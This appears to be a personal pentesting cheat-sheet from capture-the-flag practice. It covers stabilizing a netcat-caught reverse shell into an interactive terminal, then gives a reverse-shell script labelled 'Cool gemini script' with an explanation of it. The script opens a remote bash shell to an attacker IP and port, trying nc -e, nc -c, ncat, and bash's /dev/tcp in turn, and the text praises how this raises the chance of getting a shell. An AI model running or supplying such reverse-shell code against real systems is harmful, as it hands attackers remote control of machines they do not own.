Shell Stabilization
From Reverse Shell to full interactive XTERM
1
2
3
4
5
6
7
8
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@cybercrafted:/var/www/admin$ ^Z
zsh: suspended nc -lvnp 4444
┌──(kali㉿kali)-[~/thm/cybercraft]
└─$ stty raw -echo && fg
[1] + continued nc -lvnp 4444
XTERM=TERM
First execute in the revershe shell provided by nc -lnvp 4444:
1
python3 -c 'import pty; pty.spawn("/bin/bash")'
And then press ^Z (Ctrl+Z) and write the following command:
1
stty raw -echo && fg
It would get stuck so to solve this execute
1
XTERM=TERM
Finally execute in the terminal to make it completily interactive as a normal shell:
1
export TERM=xterm
Cool gemini script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/bash
# Set the IP address and port of your attack machine
ATTACK_IP="10.11.72.22" # Your attack machine's IP
ATTACK_PORT="4444" # Choose an open port on your attack machine
# Attempt different reverse shell methods for robustness
# netcat (nc) is often available, but other options are provided as fallbacks
# Method 1: netcat (nc) - most common and simplest
if command -v nc.traditional >/dev/null 2>&1; then # Check for traditional netcat
nc -nv $ATTACK_IP $ATTACK_PORT -e /bin/bash
elif command -v nc >/dev/null 2>&1; then # Check for openbsd netcat
nc -nv $ATTACK_IP $ATTACK_PORT -c /bin/bash
elif command -v ncat >/dev/null 2>&1; then # Check for ncat
ncat -nv $ATTACK_IP $ATTACK_PORT -e /bin/bash
elif command -v bash >/dev/null 2>&1; then # check if bash is there
bash -i >& /dev/tcp/$ATTACK_IP/$ATTACK_PORT 0>&1
else # no nc or ncat
echo "No netcat or ncat found. Please install one on the target machine."
fi
Explanation of command -v:
command -v
/dev/null 2>&1: This is redirection. It’s used to suppress the output
of the command -v command.
/dev/null: Redirects standard output (stdout) to /dev/null.
/dev/null is like a black hole; anything sent there is discarded.
We don’t want to see the path printed by command -v in the output.
2>&1: Redirects standard error (stderr) to the same location as stdout
(/dev/null). This is important because if the command doesn’t exist,
command -v will print an error message to stderr.
We want to suppress that error message as well.
if and elif: The if and elif statements use the exit code of the
command -v command to determine which block of code to execute.
If command -v finds the command (e.g., nc.traditional), it returns a zero
exit code (success), and the corresponding block of code is executed.
If command -v doesn’t find the command, it returns a non-zero exit code
(failure), and the if or elif condition is considered false, and the
script moves to the next elif or the else block.
How it works in the script:
if command -v nc.traditional …: The script first checks for
nc.traditional. This is important because some systems have a separate
nc.traditional binary.
elif command -v nc …: If nc.traditional isn’t found, it checks for the
standard nc (netcat). Different versions of nc might be installed
(e.g., OpenBSD nc), so this is a general check.
elif command -v ncat …: If neither nc.traditional nor nc is found,
it checks for ncat. ncat is another networking utility that can create
reverse shells.
elif command -v bash …: If none of the nc or ncat variants are found,
it checks for bash itself. As a last resort, it uses bash’s built-in TCP
functionality.
else …: If none of the above commands are found, the else block is
executed, printing an error message.
Why this is important:
This approach makes the reverse shell script adaptable to different systems.
It doesn’t assume that a specific version of nc or ncat is installed.
It checks for the available tools and uses the most appropriate one.
This is what makes the script robust. It significantly increases the
chances of getting a reverse shell, even if the target system has a limited
set of tools.